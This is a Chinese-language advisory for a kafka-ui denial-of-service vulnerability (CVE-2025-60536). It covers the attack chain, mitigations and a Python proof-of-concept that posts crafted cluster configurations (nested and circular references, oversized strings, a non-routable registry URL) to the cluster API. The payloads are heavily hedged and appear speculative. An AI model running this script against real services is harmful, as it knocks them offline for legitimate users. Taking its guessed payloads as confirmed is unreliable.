CVE-2025-60536 kafka-ui配置接口拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-60536

漏洞类型

拒绝服务攻击（DoS）

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

kafka-ui (provectus/kafka-ui)

漏洞概述

CVE-2025-60536是kafka-ui（由provectus开发的Apache Kafka Web管理界面）中的一个高危拒绝服务（DoS）漏洞。该漏洞存在于"Configure New Cluster"（配置新集群）接口中，攻击者可以通过上传精心构造的恶意配置文件来触发拒绝服务攻击。kafka-ui是一款广泛使用的Kafka集群管理工具，为用户提供直观的Web界面来管理和监控Kafka集群。由于该漏洞可被远程攻击者利用，且无需任何认证和用户交互，攻击者只需通过网络向目标kafka-ui实例的集群配置接口上传恶意配置文件，即可导致服务不可用。该漏洞的CVSS评分为7.5，属于高危级别，其根本原因在于应用在处理用户上传的集群配置文件时缺乏充分的输入验证和安全检查，导致恶意配置可触发系统异常或资源耗尽。受影响版本范围为v0.6.0至v0.7.2，使用这些版本的用户应尽快升级到修复版本以避免潜在的攻击风险。该漏洞由相关安全研究人员发现并报告至MITRE，披露日期为2025年10月14日。

技术细节

kafka-ui的"Configure New Cluster"接口允许用户通过上传配置文件的方式来添加新的Kafka集群。该接口在处理上传的配置文件时，未能对配置内容进行充分的安全验证和过滤。攻击者可以构造包含恶意内容的配置文件（例如包含超长字符串、特殊字符、嵌套引用、循环引用或可能导致反序列化异常的数据），当kafka-ui解析这些恶意配置时，会触发应用层的异常处理缺陷，可能导致以下后果：

1. **资源耗尽型DoS**：恶意配置可能包含大量嵌套引用或循环引用，导致解析器进入无限循环或消耗大量内存资源，最终使JVM抛出OutOfMemoryError异常。

2. **异常处理缺陷型DoS**：通过精心构造的配置内容（如不兼容的Schema Registry配置、无效的URL或畸形的数据结构），触发应用内部未捕获的异常，导致Web服务线程崩溃或关键服务组件停止响应。

3. **线程阻塞型DoS**：根据漏洞涉及的SchemaRegistrySerde.java代码分析，恶意配置可能导致Schema Registry连接线程进入阻塞状态，使整个Web服务无法正常处理其他请求。

漏洞利用条件：攻击者只需通过网络访问kafka-ui的Web界面（默认端口8080），找到"Configure New Cluster"功能，上传精心构造的配置文件即可触发。整个攻击过程无需认证（PR:N）、无需用户交互（UI:N），攻击复杂度低（AC:L），网络可达即可发起攻击（AV:N）。

攻击链分析

STEP 1

步骤1：侦察目标

攻击者通过网络扫描或信息收集，定位运行kafka-ui v0.6.0至v0.7.2版本的目标系统，确认其Web管理界面（默认8080端口）可访问。

STEP 2

步骤2：访问配置接口

攻击者访问kafka-ui的Web界面，定位到"Configure New Cluster"功能接口，该接口允许用户通过上传配置文件添加新的Kafka集群。

STEP 3

步骤3：构造恶意配置

攻击者精心构造包含恶意内容的配置文件，如超长字符串、循环引用、不可达的Schema Registry URL或畸形的数据结构，用于触发应用异常或资源耗尽。

STEP 4

步骤4：上传恶意配置

攻击者通过API接口或Web界面将恶意配置文件上传至kafka-ui，触发应用对恶意配置的解析处理。

STEP 5

步骤5：触发拒绝服务

kafka-ui在解析恶意配置时触发漏洞，导致服务异常崩溃、内存耗尽或线程阻塞，最终使Web管理界面完全不可用，影响所有合法用户的正常使用。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-60536 - kafka-ui DoS via Crafted Configuration File
# Exploit: Upload a malicious cluster configuration to trigger DoS

import requests
import json

TARGET_URL = "http://target-kafka-ui-host:8080"
CLUSTER_CONFIG_ENDPOINT = f"{TARGET_URL}/api/clusters"

# Malicious configuration designed to trigger DoS
# Option 1: Resource exhaustion via deeply nested references
malicious_config_resource_exhaustion = {
    "name": "evil-cluster",
    "bootstrapServers": "${${${${${${${${${${A}}}}}}}}}",  # Nested variable expansion causing stack overflow
    "properties": {
        "schema.registry.url": "http://" + "A" * 100000,  # Extremely long URL causing memory issues
    }
}

# Option 2: Invalid Schema Registry config causing thread blocking
malicious_config_schema_blocking = {
    "name": "evil-cluster-2",
    "bootstrapServers": "localhost:9092",
    "schemaRegistry": "http://10.255.255.1:8081",  # Non-routable IP causing connection timeout/blocking
    "properties": {
        "schema.registry.url": "http://10.255.255.1:8081",
        "basic.auth.user.info": "user:" + "password" * 10000
    }
}

# Option 3: Circular reference causing infinite loop
malicious_config_circular = {
    "name": "evil-cluster-3",
    "bootstrapServers": "${bootstrapServers}",  # Self-referencing variable
    "properties": {
        "key1": "${key2}",
        "key2": "${key1}",  # Circular reference
        "key3": "${key3}"   # Self-referencing
    }
}

def exploit_dos(config_payload):
    """
    Send malicious configuration to kafka-ui to trigger DoS
    """
    headers = {
        "Content-Type": "application/json",
        "Accept": "application/json"
    }

    try:
        response = requests.post(
            CLUSTER_CONFIG_ENDPOINT,
            headers=headers,
            data=json.dumps(config_payload),
            timeout=10
        )
        print(f"Status Code: {response.status_code}")
        print(f"Response: {response.text[:500]}")
        return response
    except requests.exceptions.Timeout:
        print("Request timed out - server may be unresponsive (DoS successful)")
    except requests.exceptions.ConnectionError:
        print("Connection error - server may be down (DoS successful)")
    except Exception as e:
        print(f"Error: {e}")

# Execute exploit
if __name__ == "__main__":
    print("[*] Attempting DoS via crafted configuration upload...")
    exploit_dos(malicious_config_resource_exhaustion)
    print("[*] Attempting DoS via Schema Registry blocking...")
    exploit_dos(malicious_config_schema_blocking)
    print("[*] Attempting DoS via circular reference...")
    exploit_dos(malicious_config_circular)
    print("[*] Done. Check target service availability.")

影响范围

kafka-ui >= v0.6.0

kafka-ui <= v0.7.2

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制kafka-ui管理界面的网络访问范围，仅允许可信IP地址访问；2）通过反向代理（如Nginx）配置请求体大小限制，阻止超大配置文件上传；3）为kafka-ui添加基础认证或集成企业SSO，限制未授权用户访问配置接口；4）监控kafka-ui的日志和资源使用情况，设置异常告警；5）在配置Schema Registry时使用可达的合法地址，避免因配置不可达地址导致服务线程阻塞。